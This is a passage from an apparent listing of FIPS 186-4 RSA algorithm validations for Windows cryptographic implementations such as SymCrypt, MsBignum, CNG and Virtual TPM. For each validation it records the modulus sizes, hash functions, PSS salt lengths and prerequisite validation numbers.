    Mod 2048: SHA-1: Salt Length: 160 (bits); SHA-256: Salt Length: 256 (bits); SHA-384: Salt Length: 384 (bits); SHA-512: Salt Length: 512 (bits)
    Mod 3072: SHA-1: Salt Length: 160 (bits); SHA-256: Salt Length: 256 (bits); SHA-384: Salt Length: 384 (bits); SHA-512: Salt Length: 512 (bits)
  Signature Verification PKCS1.5: Mod 1024 SHA: SHA-1, SHA-256, SHA-384, SHA-512; Mod 2048 SHA: SHA-1, SHA-256, SHA-384, SHA-512; Mod 3072 SHA: SHA-1, SHA-256, SHA-384, SHA-512
  Signature Verification PSS:
    Mod 1024: SHA-1: Salt Length: 160 (bits); SHA-256: Salt Length: 256 (bits); SHA-384: Salt Length: 384 (bits); SHA-512: Salt Length: 496 (bits)
    Mod 2048: SHA-1: Salt Length: 160 (bits); SHA-256: Salt Length: 256 (bits); SHA-384: Salt Length: 384 (bits); SHA-512: Salt Length: 512 (bits)
    Mod 3072: SHA-1: Salt Length: 160 (bits); SHA-256: Salt Length: 256 (bits); SHA-384: Salt Length: 384 (bits); SHA-512: Salt Length: 512 (bits)
  Prerequisite: SHS #4011, DRBG #1732
Windows 10 Mobile (version 1709) SymCrypt Cryptographic Implementations #2670
Version 10.0.15254
  RSA 186-4:
  Key Generation: Probable Random Primes: Mod lengths: 2048, 3072 (bits); Primality Tests: C.2
  Signature Generation PKCS1.5: Mod 2048 SHA: SHA-1, SHA-256, SHA-384, SHA-512; Mod 3072 SHA: SHA-1, SHA-256, SHA-384, SHA-512
  Signature Generation PSS:
    Mod 2048: SHA-1: Salt Length: 160 (bits); SHA-256: Salt Length: 256 (bits); SHA-384: Salt Length: 384 (bits); SHA-512: Salt Length: 512 (bits)
    Mod 3072: SHA-1: Salt Length: 160 (bits); SHA-256: Salt Length: 256 (bits); SHA-384: Salt Length: 384 (bits); SHA-512: Salt Length: 512 (bits)
  Signature Verification PKCS1.5: Mod 1024 SHA: SHA-1, SHA-256, SHA-384, SHA-512; Mod 2048 SHA: SHA-1, SHA-256, SHA-384, SHA-512; Mod 3072 SHA: SHA-1, SHA-256, SHA-384, SHA-512
  Signature Verification PSS:
    Mod 1024: SHA-1: Salt Length: 160 (bits); SHA-256: Salt Length: 256 (bits); SHA-384: Salt Length: 384 (bits); SHA-512: Salt Length: 496 (bits)
    Mod 2048: SHA-1: Salt Length: 160 (bits); SHA-256: Salt Length: 256 (bits); SHA-384: Salt Length: 384 (bits); SHA-512: Salt Length: 512 (bits)
    Mod 3072: SHA-1: Salt Length: 160 (bits); SHA-256: Salt Length: 256 (bits); SHA-384: Salt Length: 384 (bits); SHA-512: Salt Length: 512 (bits)
  Prerequisite: SHS #4010, DRBG #1731

Windows 10 Mobile (version 1709) MsBignum Cryptographic Implementations #2669
Version 10.0.15254
  RSA 186-4:
  Key Generation: Public Key Exponent: Fixed (10001); Provable Primes with Conditions: Mod lengths: 2048, 3072 (bits); Primality Tests: C.3
  Signature Generation PKCS1.5: Mod 2048 SHA: SHA-1, SHA-256, SHA-384, SHA-512; Mod 3072 SHA: SHA-1, SHA-256, SHA-384, SHA-512
  Signature Generation PSS:
    Mod 2048: SHA-1: Salt Length: 160 (bits); SHA-256: Salt Length: 256 (bits); SHA-384: Salt Length: 384 (bits); SHA-512: Salt Length: 512 (bits)
    Mod 3072: SHA-1: Salt Length: 160 (bits); SHA-256: Salt Length: 256 (bits); SHA-384: Salt Length: 384 (bits); SHA-512: Salt Length: 512 (bits)
  Signature Verification PKCS1.5: Mod 1024 SHA: SHA-1, SHA-256, SHA-384, SHA-512; Mod 2048 SHA: SHA-1, SHA-256, SHA-384, SHA-512; Mod 3072 SHA: SHA-1, SHA-256, SHA-384, SHA-512
  Signature Verification PSS:
    Mod 1024: SHA-1: Salt Length: 160 (bits); SHA-256: Salt Length: 256 (bits); SHA-384: Salt Length: 384 (bits); SHA-512: Salt Length: 496 (bits)
    Mod 2048: SHA-1: Salt Length: 160 (bits); SHA-256: Salt Length: 256 (bits); SHA-384: Salt Length: 384 (bits); SHA-512: Salt Length: 512 (bits)
    Mod 3072: SHA-1: Salt Length: 160 (bits); SHA-256: Salt Length: 256 (bits); SHA-384: Salt Length: 384 (bits); SHA-512: Salt Length: 512 (bits)
  Prerequisite: SHS #4010, DRBG #1731
Windows 10 Home, Pro, Enterprise, Education, Windows 10 S Fall Creators Update and Windows Server, Windows Server Datacenter (version 1709); MsBignum Cryptographic Implementations #2668
Version 10.0.16299
  RSA 186-4:
  Key Generation: Public Key Exponent: Fixed (10001); Provable Primes with Conditions: Mod lengths: 2048, 3072 (bits); Primality Tests: C.3
  Signature Generation PKCS1.5: Mod 2048 SHA: SHA-1, SHA-256, SHA-384, SHA-512; Mod 3072 SHA: SHA-1, SHA-256, SHA-384, SHA-512
  Signature Generation PSS:
    Mod 2048: SHA-1: Salt Length: 160 (bits); SHA-256: Salt Length: 256 (bits); SHA-384: Salt Length: 384 (bits); SHA-512: Salt Length: 512 (bits)
    Mod 3072: SHA-1: Salt Length: 160 (bits); SHA-256: Salt Length: 256 (bits); SHA-384: Salt Length: 384 (bits); SHA-512: Salt Length: 512 (bits)
  Signature Verification PKCS1.5: Mod 1024 SHA: SHA-1, SHA-256, SHA-384, SHA-512; Mod 2048 SHA: SHA-1, SHA-256, SHA-384, SHA-512; Mod 3072 SHA: SHA-1, SHA-256, SHA-384, SHA-512
  Signature Verification PSS:
    Mod 1024: SHA-1: Salt Length: 160 (bits); SHA-256: Salt Length: 256 (bits); SHA-384: Salt Length: 384 (bits); SHA-512: Salt Length: 496 (bits)
    Mod 2048: SHA-1: Salt Length: 160 (bits); SHA-256: Salt Length: 256 (bits); SHA-384: Salt Length: 384 (bits); SHA-512: Salt Length: 512 (bits)
    Mod 3072: SHA-1: Salt Length: 160 (bits); SHA-256: Salt Length: 256 (bits); SHA-384: Salt Length: 384 (bits); SHA-512: Salt Length: 512 (bits)
  Prerequisite: SHS #4009, DRBG #1730

Windows 10 Home, Pro, Enterprise, Education, Windows 10 S Fall Creators Update and Windows Server, Windows Server Datacenter (version 1709); SymCrypt Cryptographic Implementations #2667
Version 10.0.16299
  RSA 186-4:
  Key Generation: Probable Random Primes: Mod lengths: 2048, 3072 (bits); Primality Tests: C.2
  Signature Generation PKCS1.5: Mod 2048 SHA: SHA-1, SHA-256, SHA-384, SHA-512; Mod 3072 SHA: SHA-1, SHA-256, SHA-384, SHA-512
  Signature Generation PSS:
    Mod 2048: SHA-1: Salt Length: 160 (bits); SHA-256: Salt Length: 256 (bits); SHA-384: Salt Length: 384 (bits); SHA-512: Salt Length: 512 (bits)
    Mod 3072: SHA-1: Salt Length: 160 (bits); SHA-256: Salt Length: 256 (bits); SHA-384: Salt Length: 384 (bits); SHA-512: Salt Length: 512 (bits)
  Signature Verification PKCS1.5: Mod 1024 SHA: SHA-1, SHA-256, SHA-384, SHA-512; Mod 2048 SHA: SHA-1, SHA-256, SHA-384, SHA-512; Mod 3072 SHA: SHA-1, SHA-256, SHA-384, SHA-512
  Signature Verification PSS:
    Mod 1024: SHA-1: Salt Length: 160 (bits); SHA-256: Salt Length: 256 (bits); SHA-384: Salt Length: 384 (bits); SHA-512: Salt Length: 496 (bits)
    Mod 2048: SHA-1: Salt Length: 160 (bits); SHA-256: Salt Length: 256 (bits); SHA-384: Salt Length: 384 (bits); SHA-512: Salt Length: 512 (bits)
    Mod 3072: SHA-1: Salt Length: 160 (bits); SHA-256: Salt Length: 256 (bits); SHA-384: Salt Length: 384 (bits); SHA-512: Salt Length: 512 (bits)
  Prerequisite: SHS #4009, DRBG #1730
Windows 10 Creators Update (version 1703) Pro, Enterprise, Education Virtual TPM Implementations #2524
Version 10.0.15063
  FIPS186-4:
  ALG[RSASSA-PKCS1_V1_5] SIG(gen) (2048 SHA( 1 , 256 , 384 )) SIG(gen) with SHA-1 affirmed for use with protocols only.
  SIG(Ver) (1024 SHA( 1 , 256 , 384 )) (2048 SHA( 1 , 256 , 384 ))
  [RSASSA-PSS]: Sig(Gen): (2048 SHA( 1 SaltLen( 20 ) , 256 SaltLen( 32 ) , 384 SaltLen( 48 ) )) SIG(gen) with SHA-1 affirmed for use with protocols only.
  Sig(Ver): (1024 SHA( 1 SaltLen( 20 ) , 256 SaltLen( 32 ) , 384 SaltLen( 48 ) )) (2048 SHA( 1 SaltLen( 20 ) , 256 SaltLen( 32 ) , 384 SaltLen( 48 ) ))
  SHA Val#3790

Windows 10 Creators Update (version 1703) Home, Pro, Enterprise, Education, Windows 10 S, Windows 10 Mobile RSA32 Algorithm Implementations #2523
Version 10.0.15063
  FIPS186-4:
  ALG[RSASSA-PKCS1_V1_5] SIG(Ver) (1024 SHA( 1 , 256 , 384 , 512 )) (2048 SHA( 1 , 256 , 384 , 512 )) (3072 SHA( 1 , 256 , 384 , 512 ))
  SHA Val#3790

Windows 10 Creators Update (version 1703) Home, Pro, Enterprise, Education, Windows 10 S, Windows 10 Mobile MsBignum Cryptographic Implementations #2522
Version 10.0.15063
  FIPS186-4:
  186-4KEY(gen): FIPS186-4_Fixed_e ( 10001 ) ; PGM(ProbPrimeCondition): 2048 , 3072 PPTT:( C.3 )
  ALG[RSASSA-PKCS1_V1_5] SIG(gen) (2048 SHA( 1 , 256 , 384 , 512 )) (3072 SHA( 1 , 256 , 384 , 512 )) SIG(gen) with SHA-1 affirmed for use with protocols only.
  SIG(Ver) (1024 SHA( 1 , 256 , 384 , 512 )) (2048 SHA( 1 , 256 , 384 , 512 )) (3072 SHA( 1 , 256 , 384 , 512 ))
  [RSASSA-PSS]: Sig(Gen): (2048 SHA( 1 SaltLen( 20 ) , 256 SaltLen( 32 ) , 384 SaltLen( 48 ) , 512 SaltLen( 64 ) )) (3072 SHA( 1 SaltLen( 20 ) , 256 SaltLen( 32 ) , 384 SaltLen( 48 ) , 512 SaltLen( 64 ) )) SIG(gen) with SHA-1 affirmed for use with protocols only.
  Sig(Ver): (1024 SHA( 1 SaltLen( 20 ) , 256 SaltLen( 32 ) , 384 SaltLen( 48 ) , 512 SaltLen( 62 ) )) (2048 SHA( 1 SaltLen( 20 ) , 256 SaltLen( 32 ) , 384 SaltLen( 48 ) , 512 SaltLen( 64 ) )) (3072 SHA( 1 SaltLen( 20 ) , 256 SaltLen( 32 ) , 384 SaltLen( 48 ) , 512 SaltLen( 64 ) ))
  SHA Val#3790
  DRBG: Val# 1555

Windows 10 Creators Update (version 1703) Home, Pro, Enterprise, Education, Windows 10 S, Windows 10 Mobile SymCrypt Cryptographic Implementations #2521
Version 10.0.15063
  FIPS186-4:
  186-4KEY(gen): PGM(ProbRandom: ( 2048 , 3072 ) PPTT:( C.2 )
  ALG[RSASSA-PKCS1_V1_5] SIG(gen) (2048 SHA( 1 , 256 , 384 , 512 )) (3072 SHA( 1 , 256 , 384 , 512 )) SIG(gen) with SHA-1 affirmed for use with protocols only.
  SIG(Ver) (1024 SHA( 1 , 256 , 384 , 512 )) (2048 SHA( 1 , 256 , 384 , 512 )) (3072 SHA( 1 , 256 , 384 , 512 ))
  [RSASSA-PSS]: Sig(Gen): (2048 SHA( 1 SaltLen( 20 ) , 256 SaltLen( 32 ) , 384 SaltLen( 48 ) , 512 SaltLen( 64 ) )) (3072 SHA( 1 SaltLen( 20 ) , 256 SaltLen( 32 ) , 384 SaltLen( 48 ) , 512 SaltLen( 64 ) )) SIG(gen) with SHA-1 affirmed for use with protocols only.
  Sig(Ver): (1024 SHA( 1 SaltLen( 20 ) , 256 SaltLen( 32 ) , 384 SaltLen( 48 ) , 512 SaltLen( 62 ) )) (2048 SHA( 1 SaltLen( 20 ) , 256 SaltLen( 32 ) , 384 SaltLen( 48 ) , 512 SaltLen( 64 ) )) (3072 SHA( 1 SaltLen( 20 ) , 256 SaltLen( 32 ) , 384 SaltLen( 48 ) , 512 SaltLen( 64 ) ))
  SHA Val#3790
Windows Embedded Compact Enhanced Cryptographic Provider (RSAENH) #2415
Version 7.00.2872
  FIPS186-2:
  ALG[ANSIX9.31]: SIG(ver); 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA-1Val#3652
  ALG[RSASSA-PKCS1_V1_5]: SIG(gen) 4096 , SHS: SHA-256Val#3652, SHA-384Val#3652, SHA-512Val#3652
  SIG(ver): 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA-1Val#3652, SHA-256Val#3652, SHA-384Val#3652, SHA-512Val#3652
  FIPS186-4:
  ALG[ANSIX9.31] Sig(Gen): (2048 SHA( 1 )) (3072 SHA( 1 )) SIG(gen) with SHA-1 affirmed for use with protocols only.
  Sig(Ver): (1024 SHA( 1 )) (2048 SHA( 1 )) (3072 SHA( 1 ))
  ALG[RSASSA-PKCS1_V1_5] SIG(gen) (2048 SHA( 1 , 256 , 384 , 512 )) (3072 SHA( 1 , 256 , 384 , 512 )) SIG(gen) with SHA-1 affirmed for use with protocols only.
  SIG(Ver) (1024 SHA( 1 , 256 , 384 , 512 )) (2048 SHA( 1 , 256 , 384 , 512 )) (3072 SHA( 1 , 256 , 384 , 512 ))
  SHA Val#3652

Windows Embedded Compact Enhanced Cryptographic Provider (RSAENH) #2414
Version 8.00.6246
  FIPS186-2:
  ALG[ANSIX9.31]: SIG(ver); 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA-1Val#3651
  ALG[RSASSA-PKCS1_V1_5]: SIG(gen) 4096 , SHS: SHA-256Val#3651, SHA-384Val#3651, SHA-512Val#3651
  SIG(ver): 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA-1Val#3651, SHA-256Val#3651, SHA-384Val#3651, SHA-512Val#3651
  FIPS186-4:
  ALG[ANSIX9.31] Sig(Gen): (2048 SHA( 1 )) (3072 SHA( 1 )) SIG(gen) with SHA-1 affirmed for use with protocols only.
  Sig(Ver): (1024 SHA( 1 )) (2048 SHA( 1 )) (3072 SHA( 1 ))
  ALG[RSASSA-PKCS1_V1_5] SIG(gen) (2048 SHA( 1 , 256 , 384 , 512 )) (3072 SHA( 1 , 256 , 384 , 512 )) SIG(gen) with SHA-1 affirmed for use with protocols only.
  SIG(Ver) (1024 SHA( 1 , 256 , 384 , 512 )) (2048 SHA( 1 , 256 , 384 , 512 )) (3072 SHA( 1 , 256 , 384 , 512 ))
  SHA Val#3651

Windows Embedded Compact Cryptographic Primitives Library (bcrypt.dll) #2412
Version 7.00.2872
  FIPS186-2:
  ALG[RSASSA-PKCS1_V1_5]: SIG(gen) 4096 , SHS: SHA-256Val#3649, SHA-384Val#3649, SHA-512Val#3649
  SIG(ver): 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA-1Val#3649, SHA-256Val#3649, SHA-384Val#3649, SHA-512Val#3649
  FIPS186-4:
  186-4KEY(gen): FIPS186-4_Fixed_e (10001) ; PGM(ProbRandom: ( 2048 , 3072 ) PPTT:( C.2 )
  ALG[RSASSA-PKCS1_V1_5] SIG(gen) (2048 SHA( 1 , 256 , 384 , 512 )) (3072 SHA( 1 , 256 , 384 , 512 )) SIG(gen) with SHA-1 affirmed for use with protocols only.
  SIG(Ver) (1024 SHA( 1 , 256 , 384 , 512 )) (2048 SHA( 1 , 256 , 384 , 512 )) (3072 SHA( 1 , 256 , 384 , 512 ))
  SHA Val#3649
  DRBG: Val# 1430

Windows Embedded Compact Cryptographic Primitives Library (bcrypt.dll) #2411
Version 8.00.6246
  FIPS186-2:
  ALG[RSASSA-PKCS1_V1_5]: SIG(gen) 4096 , SHS: SHA-256Val#3648, SHA-384Val#3648, SHA-512Val#3648
  SIG(ver): 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA-1Val#3648, SHA-256Val#3648, SHA-384Val#3648, SHA-512Val#3648
  FIPS186-4:
  186-4KEY(gen): FIPS186-4_Fixed_e (10001) ; PGM(ProbRandom: ( 2048 , 3072 ) PPTT:( C.2 )
  ALG[RSASSA-PKCS1_V1_5] SIG(gen) (2048 SHA( 1 , 256 , 384 , 512 )) (3072 SHA( 1 , 256 , 384 , 512 )) SIG(gen) with SHA-1 affirmed for use with protocols only.
  SIG(Ver) (1024 SHA( 1 , 256 , 384 , 512 )) (2048 SHA( 1 , 256 , 384 , 512 )) (3072 SHA( 1 , 256 , 384 , 512 ))
  SHA Val#3648
  DRBG: Val# 1429

Microsoft Windows 10 Anniversary Update, Windows Server 2016, Windows Storage Server 2016; Microsoft Surface Book, Surface Pro 4 and Surface Pro 3 w/ Windows 10 Anniversary Update Virtual TPM Implementations #2206
Version 10.0.14393
  FIPS186-4:
  ALG[RSASSA-PKCS1_V1_5] SIG(gen) (2048 SHA( 1 , 256 , 384 )) SIG(gen) with SHA-1 affirmed for use with protocols only.
  SIG(Ver) (1024 SHA( 1 , 256 , 384 )) (2048 SHA( 1 , 256 , 384 ))
  [RSASSA-PSS]: Sig(Gen): (2048 SHA( 1 SaltLen( 20 ) , 256 SaltLen( 32 ) , 384 SaltLen( 48 ) )) SIG(gen) with SHA-1 affirmed for use with protocols only.
  Sig(Ver): (1024 SHA( 1 SaltLen( 20 ) , 256 SaltLen( 32 ) , 384 SaltLen( 48 ) )) (2048 SHA( 1 SaltLen( 20 ) , 256 SaltLen( 32 ) , 384 SaltLen( 48 ) ))
  SHA Val# 3347

Microsoft Windows 10 Anniversary Update, Windows Server 2016, Windows Storage Server 2016; Microsoft Surface Book, Surface Pro 4, Surface Pro 3 and Surface 3 w/ Windows 10 Anniversary Update; Microsoft Lumia 950 and Lumia 650 w/ Windows 10 Mobile Anniversary Update RSA Key Generation Implementation #2195
Version 10.0.14393
  FIPS186-4:
  186-4KEY(gen): FIPS186-4_Fixed_e ( 10001 ) ; PGM(ProbPrimeCondition): 2048 , 3072 PPTT:( C.3 )
  SHA Val# 3347 DRBG: Val# 1217

Microsoft Windows 10 Anniversary Update, Windows Server 2016, Windows Storage Server 2016; Microsoft Surface Book, Surface Pro 4, Surface Pro 3 and Surface 3 w/ Windows 10 Anniversary Update; Microsoft Lumia 950 and Lumia 650 w/ Windows 10 Mobile Anniversary Update RSA32 Algorithm Implementations #2194
Version 10.0.14393
  FIPS186-4:
  ALG[RSASSA-PKCS1_V1_5] SIG(Ver) (1024 SHA( 1 , 256 , 384 , 512 )) (2048 SHA( 1 , 256 , 384 , 512 )) (3072 SHA( 1 , 256 , 384 , 512 ))
  SHA Val#3346

Microsoft Windows 10 Anniversary Update, Windows Server 2016, Windows Storage Server 2016; Microsoft Surface Book, Surface Pro 4, Surface Pro 3 and Surface 3 w/ Windows 10 Anniversary Update; Microsoft Lumia 950 and Lumia 650 w/ Windows 10 Mobile Anniversary Update MsBignum Cryptographic Implementations #2193
Version 10.0.14393
  FIPS186-4:
  ALG[RSASSA-PKCS1_V1_5] SIG(gen) (2048 SHA( 256 , 384 , 512 )) (3072 SHA( 256 , 384 , 512 ))
  SIG(Ver) (1024 SHA( 1 , 256 , 384 , 512 )) (2048 SHA( 1 , 256 , 384 , 512 )) (3072 SHA( 1 , 256 , 384 , 512 ))
  SHA Val# 3347 DRBG: Val# 1217

Microsoft Windows 10 Anniversary Update, Windows Server 2016, Windows Storage Server 2016; Microsoft Surface Book, Surface Pro 4, Surface Pro 3 and Surface 3 w/ Windows 10 Anniversary Update; Microsoft Lumia 950 and Lumia 650 w/ Windows 10 Mobile Anniversary Update Cryptography Next Generation (CNG) Implementations #2192
Version 10.0.14393
  FIPS186-4:
  [RSASSA-PSS]: Sig(Gen): (2048 SHA( 256 SaltLen( 32 ) , 384 SaltLen( 48 ) , 512 SaltLen( 64 ) )) (3072 SHA( 256 SaltLen( 32 ) , 384 SaltLen( 48 ) , 512 SaltLen( 64 ) ))
  Sig(Ver): (1024 SHA( 1 SaltLen( 20 ) , 256 SaltLen( 32 ) , 384 SaltLen( 48 ) , 512 SaltLen( 62 ) )) (2048 SHA( 1 SaltLen( 20 ) , 256 SaltLen( 32 ) , 384 SaltLen( 48 ) , 512 SaltLen( 64 ) )) (3072 SHA( 1 SaltLen( 20 ) , 256 SaltLen( 32 ) , 384 SaltLen( 48 ) , 512 SaltLen( 64 ) ))
  SHA Val# 3347 DRBG: Val# 1217

Microsoft Windows 10 November 2015 Update; Microsoft Surface Book, Surface Pro 4, Surface Pro 3, Surface 3, Surface Pro 2, and Surface Pro w/ Windows 10 November 2015 Update; Windows 10 Mobile for Microsoft Lumia 950 and Microsoft Lumia 635; Windows 10 for Microsoft Surface Hub 84” and Surface Hub 55” RSA Key Generation Implementation #1889
Version 10.0.10586
  FIPS186-4:
  186-4KEY(gen): FIPS186-4_Fixed_e ( 10001 ) ; PGM(ProbPrimeCondition): 2048 , 3072 PPTT:( C.3 )
  SHA Val# 3047 DRBG: Val# 955

Microsoft Windows 10 November 2015 Update; Microsoft Surface Book, Surface Pro 4, Surface Pro 3, Surface 3, Surface Pro 2, and Surface Pro w/ Windows 10 November 2015 Update; Windows 10 Mobile for Microsoft Lumia 950 and Microsoft Lumia 635; Windows 10 for Microsoft Surface Hub and Surface Hub RSA32 Algorithm Implementations #1871
Version 10.0.10586
  FIPS186-4:
  ALG[RSASSA-PKCS1_V1_5] SIG(Ver) (1024 SHA( 1 , 256 , 384 , 512 )) (2048 SHA( 1 , 256 , 384 , 512 )) (3072 SHA( 1 , 256 , 384 , 512 ))
  SHA Val#3048

Microsoft Windows 10 November 2015 Update; Microsoft Surface Book, Surface Pro 4, Surface Pro 3, Surface 3, Surface Pro 2, and Surface Pro w/ Windows 10 November 2015 Update; Windows 10 Mobile for Microsoft Lumia 950 and Microsoft Lumia 635; Windows 10 for Microsoft Surface Hub and Surface Hub MsBignum Cryptographic Implementations #1888
Version 10.0.10586
  FIPS186-4:
  ALG[RSASSA-PKCS1_V1_5] SIG(gen) (2048 SHA( 256 , 384 , 512 )) (3072 SHA( 256 , 384 , 512 ))
  SIG(Ver) (1024 SHA( 1 , 256 , 384 , 512 )) (2048 SHA( 1 , 256 , 384 , 512 )) (3072 SHA( 1 , 256 , 384 , 512 ))
  SHA Val# 3047

Microsoft Windows 10 November 2015 Update; Microsoft Surface Book, Surface Pro 4, Surface Pro 3, Surface 3, Surface Pro 2, and Surface Pro w/ Windows 10 November 2015 Update; Windows 10 Mobile for Microsoft Lumia 950 and Microsoft Lumia 635; Windows 10 for Microsoft Surface Hub and Surface Hub Cryptography Next Generation (CNG) Implementations #1887
Version 10.0.10586
  FIPS186-4:
  [RSASSA-PSS]: Sig(Gen): (2048 SHA( 256 SaltLen( 32 ) , 384 SaltLen( 48 ) , 512 SaltLen( 64 ) )) (3072 SHA( 256 SaltLen( 32 ) , 384 SaltLen( 48 ) , 512 SaltLen( 64 ) ))
  Sig(Ver): (1024 SHA( 1 SaltLen( 20 ) , 256 SaltLen( 32 ) , 384 SaltLen( 48 ) , 512 SaltLen( 62 ) )) (2048 SHA( 1 SaltLen( 20 ) , 256 SaltLen( 32 ) , 384 SaltLen( 48 ) , 512 SaltLen( 64 ) )) (3072 SHA( 1 SaltLen( 20 ) , 256 SaltLen( 32 ) , 384 SaltLen( 48 ) , 512 SaltLen( 64 ) ))
  SHA Val# 3047

Microsoft Windows 10, Microsoft Surface Pro 3 with Windows 10, Microsoft Surface 3 with Windows 10, Microsoft Surface Pro 2 with Windows 10, Microsoft Surface Pro with Windows 10 RSA Key Generation Implementation #1798
Version 10.0.10240
  FIPS186-4:
  186-4KEY(gen): FIPS186-4_Fixed_e ( 10001 ) ; PGM(ProbPrimeCondition): 2048 , 3072 PPTT:( C.3 )
  SHA Val# 2886 DRBG: Val# 868

Microsoft Windows 10, Microsoft Surface Pro 3 with Windows 10, Microsoft Surface 3 with Windows 10, Microsoft Surface Pro 2 with Windows 10, Microsoft Surface Pro with Windows 10 RSA32 Algorithm Implementations #1784
Version 10.0.10240
  FIPS186-4:
  ALG[RSASSA-PKCS1_V1_5] SIG(Ver) (1024 SHA( 1 , 256 , 384 , 512 )) (2048 SHA( 1 , 256 , 384 , 512 )) (3072 SHA( 1 , 256 , 384 , 512 ))
  SHA Val#2871

Microsoft Windows 10, Microsoft Surface Pro 3 with Windows 10, Microsoft Surface 3 with Windows 10, Microsoft Surface Pro 2 with Windows 10, Microsoft Surface Pro with Windows 10 MsBignum Cryptographic Implementations #1783
Version 10.0.10240
  FIPS186-4:
  ALG[RSASSA-PKCS1_V1_5] SIG(Ver) (1024 SHA( 1 , 256 , 384 , 512 )) (2048 SHA( 1 , 256 , 384 , 512 )) (3072 SHA( 1 , 256 , 384 , 512 ))
  SHA Val#2871

Microsoft Windows 10, Microsoft Surface Pro 3 with Windows 10, Microsoft Surface 3 with Windows 10, Microsoft Surface Pro 2 with Windows 10, Microsoft Surface Pro with Windows 10 Cryptography Next Generation (CNG) Implementations #1802
Version 10.0.10240
  FIPS186-4:
  [RSASSA-PSS]: Sig(Gen): (2048 SHA( 256 SaltLen( 32 ) , 384 SaltLen( 48 ) , 512 SaltLen( 64 ) )) (3072 SHA( 256 SaltLen( 32 ) , 384 SaltLen( 48 ) , 512 SaltLen( 64 ) ))
  Sig(Ver): (2048 SHA( 1 SaltLen( 20 ) , 256 SaltLen( 32 ) , 384 SaltLen( 48 ) , 512 SaltLen( 64 ) )) (3072 SHA( 1 SaltLen( 20 ) , 256 SaltLen( 32 ) , 384 SaltLen( 48 ) , 512 SaltLen( 64 ) ))
  SHA Val# 2886
Microsoft Windows 8.1, Microsoft Windows Server 2012 R2, Microsoft Windows Storage Server 2012 R2, Microsoft Windows RT 8.1, Microsoft Surface with Windows RT 8.1, Microsoft Surface Pro with Windows 8.1, Microsoft Surface 2, Microsoft Surface Pro 2, Microsoft Surface Pro 3, Microsoft Windows Phone 8.1, Microsoft Windows Embedded 8.1 Industry and Microsoft StorSimple 8100 RSA Key Generation Implementation #1487
Version 6.3.9600
  FIPS186-4:
  186-4KEY(gen): FIPS186-4_Fixed_e ; PGM(ProbPrimeCondition): 2048 , 3072 PPTT:( C.3 )
  SHA Val#2373 DRBG: Val# 489

Microsoft Windows 8.1, Microsoft Windows Server 2012 R2, Microsoft Windows Storage Server 2012 R2, Microsoft Windows RT 8.1, Microsoft Surface with Windows RT 8.1, Microsoft Surface Pro with Windows 8.1, Microsoft Surface 2, Microsoft Surface Pro 2, Microsoft Surface Pro 3, Microsoft Windows Phone 8.1, Microsoft Windows Embedded 8.1 Industry RSA32 Algorithm Implementations #1494
Version 6.3.9600
  FIPS186-4:
  ALG[RSASSA-PKCS1_V1_5] SIG(Ver) (1024 SHA( 1 , 256 , 384 , 512 )) (2048 SHA( 1 , 256 , 384 , 512 )) (3072 SHA( 1 , 256 , 384 , 512 ))
  SHA Val#2373

Microsoft Windows 8.1, Microsoft Windows Server 2012 R2, Microsoft Windows Storage Server 2012 R2, Microsoft Windows RT 8.1, Microsoft Surface with Windows RT 8.1, Microsoft Surface Pro with Windows 8.1, Microsoft Surface 2, Microsoft Surface Pro 2, Microsoft Surface Pro 3, Microsoft Windows Phone 8.1, Microsoft Windows Embedded 8.1 Industry and Microsoft StorSimple 8100 MsBignum Cryptographic Implementations #1493
Version 6.3.9600
  FIPS186-4:
  ALG[RSASSA-PKCS1_V1_5] SIG(gen) (2048 SHA( 256 , 384 , 512 )) (3072 SHA( 256 , 384 , 512 ))
  SIG(Ver) (1024 SHA( 1 , 256 , 384 , 512 )) (2048 SHA( 1 , 256 , 384 , 512 )) (3072 SHA( 1 , 256 , 384 , 512 ))
  SHA Val#2373

Windows Storage Server 2012 R2, Microsoft Windows RT 8.1, Microsoft Surface with Windows RT 8.1, Microsoft Surface Pro with Windows 8.1, Microsoft Surface 2, Microsoft Surface Pro 2, Microsoft Surface Pro 3, Microsoft Windows Phone 8.1, Microsoft Windows Embedded 8.1 Industry and Microsoft StorSimple 8100 Cryptography Next Generation Cryptographic Implementations #1519
Version 6.3.9600
  FIPS186-4:
  [RSASSA-PSS]: Sig(Gen): (2048 SHA( 256 SaltLen( 32 ) , 384 SaltLen( 48 ) , 512 SaltLen( 64 ) )) (3072 SHA( 256 SaltLen( 32 ) , 384 SaltLen( 48 ) , 512 SaltLen( 64 ) ))
  Sig(Ver): (1024 SHA( 1 SaltLen( 20 ) , 256 SaltLen( 32 ) , 384 SaltLen( 48 ) , 512 SaltLen( 62 ) )) (2048 SHA( 1 SaltLen( 20 ) , 256 SaltLen( 32 ) , 384 SaltLen( 48 ) , 512 SaltLen( 64 ) )) (3072 SHA( 1 SaltLen( 20 ) , 256 SaltLen( 32 ) , 384 SaltLen( 48 ) , 512 SaltLen( 64 ) ))
  SHA Val#2373
Windows 8, Windows RT, Windows Server 2012, Surface Windows RT, Surface Windows 8 Pro, and Windows Phone 8 Cryptography Next Generation (CNG) Implementations #1134
  FIPS186-4:
  ALG[RSASSA-PKCS1_V1_5] SIG(gen) (2048 SHA( 256 , 384 , 512-256 )) (3072 SHA( 256 , 384 , 512-256 ))
  SIG(Ver) (1024 SHA( 1 , 256 , 384 , 512-256 )) (2048 SHA( 1 , 256 , 384 , 512-256 )) (3072 SHA( 1 , 256 , 384 , 512-256 ))
  [RSASSA-PSS]: Sig(Gen): (2048 SHA( 256 , 384 , 512 )) (3072 SHA( 256 , 384 , 512 ))
  Sig(Ver): (1024 SHA( 1 , 256 , 384 , 512 )) (2048 SHA( 1 , 256 , 384 , 512 )) (3072 SHA( 1 , 256 , 384 , 512 , 512 ))
  SHA #1903
  Some of the previously validated components for this validation have been removed because they are now non-compliant per the SP800-131A transition. See Historical RSA List Val#1134.

Windows 8, Windows RT, Windows Server 2012, Surface Windows RT, Surface Windows 8 Pro, and Windows Phone 8 RSA Key Generation Implementation #1133
  FIPS186-4:
  186-4KEY(gen): FIPS186-4_Fixed_e , FIPS186-4_Fixed_e_Value ; PGM(ProbPrimeCondition): 2048 , 3072 PPTT:( C.3 )
  SHA #1903 DRBG: #258

